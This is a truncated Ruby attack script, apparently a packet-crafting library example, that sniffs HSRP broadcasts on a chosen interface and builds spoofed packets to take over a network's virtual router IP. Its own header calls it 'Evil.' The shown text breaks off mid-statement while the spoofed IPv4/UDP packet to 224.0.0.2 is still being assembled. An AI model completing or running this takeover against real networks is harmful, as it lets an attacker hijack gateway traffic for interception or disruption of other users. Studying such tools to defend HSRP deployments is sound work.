#!/usr/bin/env ruby
#
# $Id: hsrp_takeover 9 2008-03-02 04:44:32Z warchild $
#
#
# Listen for HSRP broadcasts and use the information learned 
# therein to perform an active "takeover" of that VIP.  Evil.
#
# Jon Hart <jhart@spoofed.org>
require 'rubygems'
require 'pcaprub'
require 'racket'
if (ARGV.size < 1)
  puts "Usage: $0 <iface> [new router]"
  exit
end
iface = ARGV[0]
router = ARGV[1]
begin
  p = Pcap::open_live(iface, 1500, true, 1000)
  unless (iface.nil?)
    p.setfilter("! host #{router}")
  end
rescue Exception => e
  puts "Pcap: Cannot open device #{ARGV[0]}: #{e}"
  exit
end
# prep our new takeover.  
takeover = Racket.new
takeover.l3 = IPv4.new
takeover.l3.src_ip = router 
takeover.l3.dst_ip = "224.0.0.2"
takeover.l3.protocol = 17 
takeover.l4 = UDP.new
ta